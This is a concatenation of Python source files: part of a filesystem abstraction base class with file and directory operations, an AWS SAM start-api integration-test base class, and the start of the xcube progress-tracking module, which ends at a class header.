def __init__(self, thread_synchronize=False):
"""The base class for Filesystem objects.
        :param thread_synchronize: If True, a lock object will be created for the object, otherwise a dummy lock will be used.
:type thread_synchronize: bool
"""
super(FS, self).__init__()
self.closed = False
self.thread_synchronize = thread_synchronize
if thread_synchronize:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def __del__(self):
if not getattr(self, 'closed', True):
self.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def cachehint(self, enabled):
"""Recommends the use of caching. Implementations are free to use or
ignore this value.
:param enabled: If True the implementation is permitted to aggressively cache directory
structure / file information. Caching such information can speed up many operations,
particularly for network based filesystems. The downside of caching is that
changes made to directories or files outside of this interface may not be picked up immediately.
"""
pass
# Deprecating cache_hint in favour of no underscore version, for consistency
cache_hint = cachehint
def close(self):
"""Close the filesystem. This will perform any shutdown related
operations required. This method will be called automatically when
the filesystem object is garbage collected, but it is good practice
        to call it explicitly so that any attached resources are freed when they
are no longer required.
"""
self.closed = True
def __getstate__(self):
# Locks can't be pickled, so instead we just indicate the
# type of lock that should be there. None == no lock,
# True == a proper lock, False == a dummy lock.
state = self.__dict__.copy()
lock = state.get("_lock",None)
if lock is not None:
if isinstance(lock,threading._RLock):
state["_lock"] = True
else:
state["_lock"] = False
return state
def __setstate__(self,state):
self.__dict__.update(state)
lock = state.get("_lock")
if lock is not None:
if lock:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def getmeta(self, meta_name, default=NoDefaultMeta):
"""Retrieve a meta value associated with an FS object.
Meta values are a way for an FS implementation to report potentially
useful information associated with the file system.
A meta key is a lower case string with no spaces. Meta keys may also
be grouped in namespaces in a dotted notation, e.g. 'atomic.namespaces'.
FS implementations aren't obliged to return any meta values, but the
following are common:
* *read_only* True if the file system cannot be modified
* *thread_safe* True if the implementation is thread safe
* *network* True if the file system requires network access
* *unicode_paths* True if the file system supports unicode paths
* *case_insensitive_paths* True if the file system ignores the case of paths
* *atomic.makedir* True if making a directory is an atomic operation
* *atomic.rename* True if rename is an atomic operation, (and not implemented as a copy followed by a delete)
* *atomic.setcontents* True if the implementation supports setting the contents of a file as an atomic operation (without opening a file)
* *free_space* The free space (in bytes) available on the file system
* *total_space* The total space (in bytes) available on the file system
* *virtual* True if the filesystem defers to other filesystems
FS implementations may expose non-generic meta data through a self-named namespace. e.g. ``"somefs.some_meta"``
Since no meta value is guaranteed to exist, it is advisable to always supply a
default value to ``getmeta``.
:param meta_name: The name of the meta value to retrieve
        :param default: An optional default to return, if the meta value isn't present
:raises `fs.errors.NoMetaError`: If specified meta value is not present, and there is no default
"""
if meta_name not in self._meta:
if default is not NoDefaultMeta:
return default
raise NoMetaError(meta_name=meta_name)
return self._meta[meta_name]
def hasmeta(self, meta_name):
"""Check that a meta value is supported
:param meta_name: The name of a meta value to check
:rtype: bool
"""
try:
self.getmeta(meta_name)
except NoMetaError:
return False
return True
def getsyspath(self, path, allow_none=False):
"""Returns the system path (a path recognized by the OS) if one is present.
If the path does not map to a system path (and `allow_none` is False)
then a NoSysPathError exception is thrown. Otherwise, the system
path will be returned as a unicode string.
:param path: a path within the filesystem
:param allow_none: if True, this method will return None when there is no system path,
rather than raising NoSysPathError
:type allow_none: bool
:raises `fs.errors.NoSysPathError`: if the path does not map on to a system path, and allow_none is set to False (default)
:rtype: unicode
"""
if not allow_none:
raise NoSysPathError(path=path)
return None
def hassyspath(self, path):
"""Check if the path maps to a system path (a path recognized by the OS).
:param path: path to check
:returns: True if `path` maps to a system path
:rtype: bool
"""
return self.getsyspath(path, allow_none=True) is not None
def getpathurl(self, path, allow_none=False):
"""Returns a url that corresponds to the given path, if one exists.
If the path does not have an equivalent URL form (and allow_none is False)
then a :class:`~fs.errors.NoPathURLError` exception is thrown. Otherwise the URL will be
        returned as a unicode string.
:param path: a path within the filesystem
:param allow_none: if true, this method can return None if there is no
URL form of the given path
:type allow_none: bool
:raises `fs.errors.NoPathURLError`: If no URL form exists, and allow_none is False (the default)
:rtype: unicode
"""
if not allow_none:
raise NoPathURLError(path=path)
return None
def haspathurl(self, path):
"""Check if the path has an equivalent URL form
:param path: path to check
:returns: True if `path` has a URL form
:rtype: bool
"""
return self.getpathurl(path, allow_none=True) is not None
def open(self, path, mode="r", **kwargs):
"""Open a the given path as a file-like object.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
raise UnsupportedError("open file")
def safeopen(self, path, mode="r", **kwargs):
"""Like :py:meth:`~fs.base.FS.open`, but returns a :py:class:`~fs.base.NullFile` if the file could not be opened.
A ``NullFile`` is a dummy file which has all the methods of a file-like object,
but contains no data.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
try:
f = self.open(path, mode, **kwargs)
except ResourceNotFoundError:
return NullFile()
return f
def symlink(self, linkto, path):
"""Creates a symlink.
:param linkto: To where symlink links to.
:param path: Path where we want to create symlink.
:rtype: None
"""
raise UnsupportedError("symlink")
def readlink(self, path):
"""Reads a symlink.
:param path: a path of link to read
:rtype: a dir/file where link points to
"""
raise UnsupportedError("readlink")
def exists(self, path):
"""Check if a path references a valid resource.
:param path: A path in the filesystem
:rtype: bool
"""
return self.isfile(path) or self.isdir(path)
def isdir(self, path):
"""Check if a path references a directory.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for directory")
def isfile(self, path):
"""Check if a path references a file.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for file")
def __iter__(self):
""" Iterates over paths returned by :py:meth:`~fs.base.listdir` method with default params. """
for f in self.listdir():
yield f
def listdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Lists the the files and directories under a given path.
The directory contents are returned as a list of unicode paths.
:param path: root of the path to list
:type path: string
:param wildcard: Only returns paths that match this wildcard
:type wildcard: string containing a wildcard, or a callable that accepts a path and returns a boolean
:param full: returns full paths (relative to the root)
:type full: bool
:param absolute: returns absolute paths (paths beginning with /)
:type absolute: bool
:param dirs_only: if True, only return directories
:type dirs_only: bool
:param files_only: if True, only return files
:type files_only: bool
:rtype: iterable of paths
:raises `fs.errors.ResourceNotFoundError`: if the path is not found
:raises `fs.errors.ResourceInvalidError`: if the path exists, but is not a directory
"""
raise UnsupportedError("list directory")
def listdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Retrieves a list of paths and path info under a given path.
This method behaves like listdir() but instead of just returning
the name of each item in the directory, it returns a tuple of the
name and the info dict as returned by getinfo.
This method may be more efficient than calling
:py:meth:`~fs.base.FS.getinfo` on each individual item returned by :py:meth:`~fs.base.FS.listdir`, particularly
for network based filesystems.
:param path: root of the path to list
:param wildcard: filter paths that match this wildcard
:param dirs_only: only retrieve directories
:type dirs_only: bool
:param files_only: only retrieve files
:type files_only: bool
:raises `fs.errors.ResourceNotFoundError`: If the path is not found
:raises `fs.errors.ResourceInvalidError`: If the path exists, but is not a directory
"""
path = normpath(path)
def getinfo(p):
try:
if full or absolute:
return self.getinfo(p)
else:
return self.getinfo(pathjoin(path,p))
except FSError:
return {}
return [(p, getinfo(p))
for p in self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)]
def _listdir_helper(self, path,
entries,
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""A helper method called by listdir method that applies filtering.
Given the path to a directory and a list of the names of entries within
that directory, this method applies the semantics of the listdir()
keyword arguments. An appropriately modified and filtered list of
directory entries is returned.
"""
if dirs_only and files_only:
raise ValueError("dirs_only and files_only can not both be True")
if wildcard is not None:
if not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
entries = [p for p in entries if wildcard(p)]
if dirs_only:
entries = [p for p in entries if self.isdir(pathjoin(path, p))]
elif files_only:
entries = [p for p in entries if self.isfile(pathjoin(path, p))]
if full:
entries = [pathjoin(path, p) for p in entries]
elif absolute:
entries = [abspath(pathjoin(path, p)) for p in entries]
return entries
def ilistdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding the files and directories under a given path.
        This method behaves identically to :py:meth:`fs.base.FS.listdir` but returns a generator
instead of a list. Depending on the filesystem this may be more
efficient than calling :py:meth:`fs.base.FS.listdir` and iterating over the resulting list.
"""
return iter(self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only))
def ilistdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding paths and path info under a given path.
        This method behaves identically to :py:meth:`~fs.base.FS.listdirinfo` but returns a generator
        instead of a list. Depending on the filesystem this may be more
        efficient than calling :py:meth:`~fs.base.FS.listdirinfo` and iterating over the resulting
list.
"""
return iter(self.listdirinfo(path,
wildcard,
full,
absolute,
dirs_only,
files_only))
def makedir(self, path, recursive=False, allow_recreate=False):
"""Make a directory on the filesystem.
:param path: path of directory
:param recursive: if True, any intermediate directories will also be created
:type recursive: bool
        :param allow_recreate: if True, re-creating a directory won't be an error
        :type allow_recreate: bool
:raises `fs.errors.DestinationExistsError`: if the path is already a directory, and allow_recreate is False
:raises `fs.errors.ParentDirectoryMissingError`: if a containing directory is missing and recursive is False
:raises `fs.errors.ResourceInvalidError`: if a path is an existing file
"""
raise UnsupportedError("make directory")
def remove(self, path):
"""Remove a file from the filesystem.
:param path: Path of the resource to remove
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is a directory
"""
raise UnsupportedError("remove resource")
def removedir(self, path, recursive=False, force=False):
"""Remove a directory from the filesystem
:param path: path of the directory to remove
:param recursive: if True, empty parent directories will be removed
:type recursive: bool
:param force: if True, any directory contents will be removed
:type force: bool
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is not a directory
:raises `fs.errors.DirectoryNotEmptyError`: if the directory is not empty and force is False
"""
raise UnsupportedError("remove directory")
def rename(self, src, dst):
"""Renames a file or directory
:param src: path to rename
:param dst: new name
"""
raise UnsupportedError("rename resource")
@convert_os_errors
def settimes(self, path, accessed_time=None, modified_time=None):
"""Set the accessed time and modified time of a file
:param path: path to a file
:param accessed_time: a datetime object the file was accessed (defaults to current time)
:param modified_time: a datetime object the file was modified (defaults to current time)
"""
sys_path = self.getsyspath(path, allow_none=True)
if sys_path is not None:
now = datetime.datetime.now()
if accessed_time is None:
accessed_time = now
if modified_time is None:
modified_time = now
accessed_time = int(time.mktime(accessed_time.timetuple()))
modified_time = int(time.mktime(modified_time.timetuple()))
os.utime(sys_path, (accessed_time, modified_time))
return True
else:
raise UnsupportedError("settimes")
def getinfo(self, path):
"""Returns information for a path as a dictionary. The exact content of
this dictionary will vary depending on the implementation, but will
likely include a few common values. The following values will be found
in info dictionaries for most implementations:
* "size" - Number of bytes used to store the file or directory
* "created_time" - A datetime object containing the time the resource was created
* "accessed_time" - A datetime object containing the time the resource was last accessed
* "modified_time" - A datetime object containing the time the resource was modified
:param path: a path to retrieve information for
:rtype: dict
"""
raise UnsupportedError("get resource info")
def desc(self, path):
"""Returns short descriptive text regarding a path. Intended mainly as
a debugging aid.
:param path: A path to describe
:rtype: str
"""
if not self.exists(path):
return ''
try:
sys_path = self.getsyspath(path)
except NoSysPathError:
return "No description available"
return sys_path
def getcontents(self, path):
"""Returns the contents of a file as a string.
:param path: A path of file to read
:rtype: str
:returns: file contents
"""
f = None
try:
f = self.open(path, "rb")
contents = f.read()
return contents
finally:
if f is not None:
f.close()
def setcontents(self, path, data, chunk_size=1024*64):
"""A convenience method to create a new file from a string or file-like object
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read in a chunk, if the implementation has to resort to a read / copy loop
"""
if not data:
self.createfile(path)
else:
f = None
try:
f = self.open(path, 'wb')
if hasattr(data, "read"):
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
chunk = read(chunk_size)
else:
f.write(data)
if hasattr(f, 'flush'):
f.flush()
finally:
if f is not None:
f.close()
def setcontents_async(self,
path,
data,
chunk_size=1024*64,
progress_callback=None,
finished_callback=None,
error_callback=None):
"""Create a new file from a string or file-like object asynchronously
This method returns a ``threading.Event`` object. Call the ``wait`` method on the event object
to block until all data has been written, or simply ignore it.
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read and write in a chunk
:param progress_callback: A function that is called periodically
with the number of bytes written.
:param finished_callback: A function that is called when all data has been written
:param error_callback: A function that is called with an exception
object if any error occurs during the copy process.
:returns: An event object that is set when the copy is complete, call
the `wait` method of this object to block until the data is written
"""
if progress_callback is None:
progress_callback = lambda bytes_written:None
def do_setcontents():
try:
f = None
try:
f = self.open(path, 'wb')
progress_callback(0)
if hasattr(data, "read"):
bytes_written = 0
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
bytes_written += len(chunk)
progress_callback(bytes_written)
chunk = read(chunk_size)
else:
f.write(data)
progress_callback(len(data))
if finished_callback is not None:
finished_callback()
finally:
if f is not None:
f.close()
except Exception, e:
if error_callback is not None:
error_callback(e)
finally:
finished_event.set()
finished_event = threading.Event()
threading.Thread(target=do_setcontents).start()
return finished_event
def createfile(self, path, wipe=False):
"""Creates an empty file if it doesn't exist
:param path: path to the file to create
:param wipe: if True, the contents of the file will be erased
"""
if not wipe and self.isfile(path):
return
f = None
try:
f = self.open(path, 'w')
finally:
if f is not None:
f.close()
def opendir(self, path):
"""Opens a directory and returns a FS object representing its contents.
:param path: path to directory to open
:rtype: an FS object
"""
from fs.wrapfs.subfs import SubFS
if not self.exists(path):
raise ResourceNotFoundError(path)
return SubFS(self, path)
def walk(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False):
"""Walks a directory tree and yields the root path and contents.
Yields a tuple of the path of each directory and a list of its file
contents.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: a string identifying the method used to walk the directories. There are two such methods:
* ``"breadth"`` yields paths in the top directories first
* ``"depth"`` yields the deepest paths first
:param ignore_errors: ignore any errors reading the directory
"""
def listdir(path, *args, **kwargs):
if ignore_errors:
try:
return self.listdir(path, *args, **kwargs)
except:
return []
else:
return self.listdir(path, *args, **kwargs)
if wildcard is None:
wildcard = lambda f:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
if dir_wildcard is None:
dir_wildcard = lambda f:True
elif not callable(dir_wildcard):
dir_wildcard_re = re.compile(fnmatch.translate(dir_wildcard))
dir_wildcard = lambda fn:bool (dir_wildcard_re.match(fn))
if search == "breadth":
dirs = [path]
while dirs:
current_path = dirs.pop()
paths = []
try:
for filename in listdir(current_path):
path = pathjoin(current_path, filename)
if self.isdir(path):
if dir_wildcard(path):
dirs.append(path)
else:
if wildcard(filename):
paths.append(filename)
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (current_path, paths)
elif search == "depth":
def recurse(recurse_path):
try:
for path in listdir(recurse_path, wildcard=dir_wildcard, full=True, dirs_only=True):
for p in recurse(path):
yield p
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (recurse_path, listdir(recurse_path, wildcard=wildcard, files_only=True))
for p in recurse(path):
yield p
else:
raise ValueError("Search should be 'breadth' or 'depth'")
def walkfiles(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False ):
"""Like the 'walk' method, but just yields file paths.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as walk method
:param ignore_errors: ignore any errors reading the directory
"""
for path, files in self.walk(path, wildcard=wildcard, dir_wildcard=dir_wildcard, search=search, ignore_errors=ignore_errors):
for f in files:
yield pathjoin(path, f)
def walkdirs(self,
path="/",
wildcard=None,
search="breadth",
ignore_errors=False):
"""Like the 'walk' method but yields directories.
:param path: root path to start walking
:param wildcard: if given, only return directories that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as the walk method
:param ignore_errors: ignore any errors reading the directory
"""
for p, _files in self.walk(path, dir_wildcard=wildcard, search=search, ignore_errors=ignore_errors):
yield p
def getsize(self, path):
"""Returns the size (in bytes) of a resource.
:param path: a path to the resource
:rtype: integer
:returns: the size of the file
"""
info = self.getinfo(path)
size = info.get('size', None)
if size is None:
raise OperationFailedError("get size of resource", path)
return size
def copy(self, src, dst, overwrite=False, chunk_size=1024*64):
"""Copies a file from src to dst.
:param src: the source path
:param dst: the destination path
:param overwrite: if True, then an existing file at the destination may
be overwritten; If False then DestinationExistsError
will be raised.
:param chunk_size: size of chunks to use if a simple copy is required
(defaults to 64K).
"""
if not self.isfile(src):
if self.isdir(src):
raise ResourceInvalidError(src,msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
self._shutil_copyfile(src_syspath, dst_syspath)
else:
src_file = None
try:
src_file = self.open(src, "rb")
self.setcontents(dst, src_file, chunk_size=chunk_size)
except ResourceNotFoundError:
if self.exists(src) and not self.exists(dirname(dst)):
raise ParentDirectoryMissingError(dst)
finally:
if src_file is not None:
src_file.close()
@classmethod
@convert_os_errors
def _shutil_copyfile(cls, src_syspath, dst_syspath):
try:
shutil.copyfile(src_syspath, dst_syspath)
except IOError, e:
# shutil reports ENOENT when a parent directory is missing
if getattr(e,"errno",None) == 2:
if not os.path.exists(dirname(dst_syspath)):
raise ParentDirectoryMissingError(dst_syspath)
raise
@classmethod
@convert_os_errors
def _shutil_movefile(cls, src_syspath, dst_syspath):
shutil.move(src_syspath, dst_syspath)
def move(self, src, dst, overwrite=False, chunk_size=16384):
"""moves a file from one location to another.
:param src: source path
:param dst: destination path
        :param overwrite: if True, then an existing file at the destination path
                          will be silently overwritten; if False then a
                          DestinationExistsError will be raised in this case.
        :type overwrite: bool
:param chunk_size: Size of chunks to use when copying, if a simple copy
is required
:type chunk_size: integer
"""
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
# Try to do an os-level rename if possible.
# Otherwise, fall back to copy-and-remove.
if src_syspath is not None and dst_syspath is not None:
if not os.path.isfile(src_syspath):
if os.path.isdir(src_syspath):
raise ResourceInvalidError(src, msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and os.path.exists(dst_syspath):
raise DestinationExistsError(dst)
try:
os.rename(src_syspath, dst_syspath)
return
except OSError:
pass
self.copy(src, dst, overwrite=overwrite, chunk_size=chunk_size)
self.remove(src)
def movedir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""moves a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:param ignore_errors: if True then this method will ignore FSError
exceptions when moving files
:param chunk_size: size of chunks to use when copying, if a simple copy
is required
"""
if not self.isdir(src):
if self.isfile(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
try:
os.rename(src_syspath,dst_syspath)
return
except OSError:
pass
def movefile_noerrors(src, dst, **kwargs):
try:
return self.move(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
movefile = movefile_noerrors
else:
movefile = self.move
src = abspath(src)
dst = abspath(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src, search="depth"):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
movefile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
self.removedir(dirname)
def copydir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""copies a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:type overwrite: bool
:param ignore_errors: if True, exceptions when copying will be ignored
:type ignore_errors: bool
:param chunk_size: size of chunks to use when copying, if a simple copy
is required (defaults to 16K)
"""
if not self.isdir(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
def copyfile_noerrors(src, dst, **kwargs):
try:
return self.copy(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
copyfile = copyfile_noerrors
else:
copyfile = self.copy
src = abspath(src)
dst = abspath(dst)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
copyfile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
def isdirempty(self, path):
"""Check if a directory is empty (contains no files or sub-directories)
:param path: a directory path
:rtype: bool
"""
path = normpath(path)
iter_dir = iter(self.listdir(path))
try:
iter_dir.next()
except StopIteration:
return True
return False
def makeopendir(self, path, recursive=False):
"""makes a directory (if it doesn't exist) and returns an FS object for
the newly created directory.
:param path: path to the new directory
:param recursive: if True any intermediate directories will be created
"""
self.makedir(path, allow_recreate=True, recursive=recursive)
dir_fs = self.opendir(path)
return dir_fs
def printtree(self, max_levels=5):
"""Prints a tree structure of the FS object to the console
:param max_levels: The maximum sub-directories to display, defaults to
5. Set to None for no limit
"""
from fs.utils import print_fs
print_fs(self, max_levels=max_levels)
tree = printtree
def browse(self, hide_dotfiles=False):
"""Displays the FS tree in a graphical window (requires wxPython)
:param hide_dotfiles: If True, files and folders that begin with a dot will be hidden
"""
from fs.browsewin import browse
browse(self, hide_dotfiles)
def getmmap(self, path, read_only=False, copy=False):
"""Returns a mmap object for this path.
See http://docs.python.org/library/mmap.html for more details on the mmap module.
:param path: A path on this filesystem
:param read_only: If True, the mmap may not be modified
        :param copy: If True, changes won't be written back to the underlying file (copy-on-write)
:raises `fs.errors.NoMMapError`: Only paths that have a syspath can be opened as a mmap
"""
syspath = self.getsyspath(path, allow_none=True)
if syspath is None:
raise NoMMapError(path)
try:
import mmap
except ImportError:
raise NoMMapError(msg="mmap not supported")
if read_only:
f = open(syspath, 'rb')
access = mmap.ACCESS_READ
else:
if copy:
f = open(syspath, 'rb')
access = mmap.ACCESS_COPY
else:
f = open(syspath, 'r+b')
access = mmap.ACCESS_WRITE
m = mmap.mmap(f.fileno(), 0, access=access)
return m
def flags_to_mode(flags):
"""Convert an os.O_* flag bitmask into an FS mode string."""
if flags & os.O_WRONLY:
if flags & os.O_TRUNC:
mode = "w"
elif flags & os.O_APPEND:
mode = "a"
else:
mode = "r+"
elif flags & os.O_RDWR:
if flags & os.O_TRUNC:
mode = "w+"
elif flags & os.O_APPEND:
mode = "a+"
else:
mode = "r+"
else:
mode = "r"
if flags & os.O_EXCL:
mode += "x"
return mode
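

# --- Usage sketch (not part of the original module) ---
# A small, hypothetical demonstration of flags_to_mode() and NullFile; the
# os.O_* combinations below mirror what an OS-level expose layer might pass in.
if __name__ == "__main__":
    print(flags_to_mode(os.O_WRONLY | os.O_TRUNC))    # -> "w"
    print(flags_to_mode(os.O_WRONLY | os.O_APPEND))   # -> "a"
    print(flags_to_mode(os.O_RDWR | os.O_TRUNC))      # -> "w+"
    print(flags_to_mode(os.O_RDONLY))                 # -> "r"
    null = NullFile()       # the object safeopen() returns for missing files
    print(repr(null.read()))                          # -> ''
    null.close()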
|
start_api_integ_base.py
|
from unittest import TestCase
import threading
from subprocess import Popen
import time
import os
import random
try:
from pathlib import Path
except ImportError:
from pathlib2 import Path
class StartApiIntegBaseClass(TestCase):
template = None
binary_data_file = None
integration_dir = str(Path(__file__).resolve().parents[2])
@classmethod
def setUpClass(cls):
        # This is the directory for tests/integration which will be used to find the testdata
        # files for integ tests
cls.template = cls.integration_dir + cls.template_path
if cls.binary_data_file:
cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
cls.port = str(StartApiIntegBaseClass.random_port())
        cls.thread = threading.Thread(target=cls.start_api)
        cls.thread.setDaemon(True)
        cls.thread.start()
        # wait in the main thread so tests don't run before start-api is ready
        time.sleep(5)
@classmethod
def start_api(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
        cls.start_api_process = Popen([command, "local", "start-api", "-t", cls.template, "-p", cls.port, "--debug"])
@classmethod
def tearDownClass(cls):
# After all the tests run, we need to kill the start-api process.
cls.start_api_process.kill()
@staticmethod
def random_port():
return random.randint(30000, 40000)
@staticmethod
def get_binary_data(filename):
if not filename:
return None
with open(filename, "rb") as fp:
return fp.read()
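

# --- Usage sketch (not part of the original module) ---
# A hypothetical subclass showing how an integration test might build on
# StartApiIntegBaseClass. The template path and route below are placeholders;
# a real test would live in its own module next to matching testdata files.
try:
    from urllib.request import urlopen
except ImportError:
    from urllib2 import urlopen


class ExampleStartApiUsage(StartApiIntegBaseClass):
    template_path = "/testdata/start_api/template.yaml"  # placeholder path

    def test_root_route_returns_200(self):
        response = urlopen("http://127.0.0.1:{}/hello".format(self.port))
        self.assertEqual(response.getcode(), 200)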
|
progress.py
|
# The MIT License (MIT)
# Copyright (c) 2019 by the xcube development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import time
import traceback
from abc import ABC
from typing import Sequence, Optional, Any, Tuple, Type, List
import dask.callbacks
import dask.diagnostics
from xcube.util.assertions import assert_true, assert_given
class ProgressState:
"""Represents the state of progress."""
def __init__(self, label: str, total_work: float, super_work: float):
self._label = label
self._total_work = total_work
self._super_work = super_work
self._super_work_ahead = 1.
self._exc_info = None
self._traceback = None
self._completed_work = 0.
self._finished = False
        self._start_time = time.perf_counter()
self._total_time = None
@property
def label(self) -> str:
return self._label
@property
def total_work(self) -> float:
return self._total_work
@property
def super_work(self) -> float:
return self._super_work
@property
def completed_work(self) -> float:
return self._completed_work
@property
def progress(self) -> float:
return self._completed_work / self._total_work
def to_super_work(self, work: float) -> float:
return self._super_work * work / self._total_work
@property
def exc_info(self) -> Optional[Tuple[Type, BaseException, Any]]:
return self._exc_info
@exc_info.setter
def exc_info(self, exc_info: Tuple[Type, BaseException, Any]):
self._exc_info = exc_info
@property
def exc_info_text(self) -> Optional[Tuple[str, str, List[str]]]:
if not self.exc_info:
return None
exc_type, exc_value, exc_traceback = self.exc_info
return (f'{type(exc_value).__name__}',
f'{exc_value}',
traceback.format_exception(exc_type, exc_value, exc_traceback))
@property
def finished(self) -> bool:
return self._finished
@property
def total_time(self) -> Optional[float]:
return self._total_time
@property
def super_work_ahead(self) -> float:
return self._super_work_ahead
@super_work_ahead.setter
def super_work_ahead(self, work: float):
assert_true(work > 0, 'work must be greater than zero')
self._super_work_ahead = work
def inc_work(self, work: float):
assert_true(work > 0, 'work must be greater than zero')
self._completed_work += work
def finish(self):
self._finished = True
self._total_time = time.perf_counter() - self._start_time
class ProgressObserver(ABC):
"""
A progress observer is notified about nested state changes when using the
    :class:`observe_progress` context manager.
"""
def on_begin(self, state_stack: Sequence[ProgressState]):
"""
        Called if an observed code block begins execution.
"""
def on_update(self, state_stack: Sequence[ProgressState]):
"""
        Called if the progress state has changed within an observed code block.
"""
def on_end(self, state_stack: Sequence[ProgressState]):
"""
        Called if an observed block of code ends execution.
"""
def activate(self):
_ProgressContext.instance().add_observer(self)
def deactivate(self):
_ProgressContext.instance().remove_observer(self)
class _ProgressContext:
